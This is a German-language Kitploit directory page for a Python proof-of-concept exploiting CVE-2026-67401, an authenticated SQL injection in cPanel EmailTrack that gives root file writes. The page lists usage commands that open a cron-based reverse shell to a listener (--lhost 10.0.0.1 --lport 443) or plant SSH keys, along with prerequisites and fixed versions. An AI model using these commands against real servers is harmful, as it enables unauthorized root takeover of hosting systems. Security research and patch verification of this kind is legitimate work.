Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-67401 — Python-Proof-of-Concept für CVE-2026-67401, eine authentifizierte SQL-Injection in cPanel EmailTrack, die das Schreiben beliebiger Dateien als Root über SQLite ATTACH DATABASE ermöglicht und so eine Reverse Shell oder das Hinterlegen von SSH-Keys erlaubt. | Kitploit
Tools/GitHubGitHub/axedos/cve-2026-67401
Privilege EscalationExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Python-Proof-of-Concept für CVE-2026-67401, eine authentifizierte SQL-Injection in cPanel EmailTrack, die das Schreiben beliebiger Dateien als Root über SQLite ATTACH DATABASE ermöglicht und so eine Reverse Shell oder das Hinterlegen von SSH-Keys erlaubt.

Repository anzeigen
vor 16h 13mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-67401

SQL-Injection in cPanel EmailTrack. Ein authentifizierter cPanel-Benutzer mit Mail-Berechtigungen schreibt beliebige Dateien als Root über SQLite ATTACH DATABASE. Eine Anfrage bis zum Root. Nicht auf einem echten Zielsystem getestet, der Code wurde nur aus öffentlichen Informationen und grundlegendem Diffing zusammengestellt. Recherchiert als Forscher gründlich, probiert es aus und sendet PR-Fixes.

Betrifft alle cPanel/WHM-Builds vor dem Patch vom 8. September 2026.

Was vorhanden sein sollte

  • Gültiges cPanel-Konto mit Mail-Berechtigungen auf dem Zielserver
  • Python 3, requests-Bibliothek
  • Ein Listener, falls das Reverse-Shell-Payload verwendet wird

So verwendet man es

root@kitploit:~
# Reverse-Shell über Cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# SSH-Key-Hinterlegung
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# Bestehende Sitzung
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# Trockenlauf (Anfrage anzeigen, nicht senden)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

FIXES

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
Tool herunterladen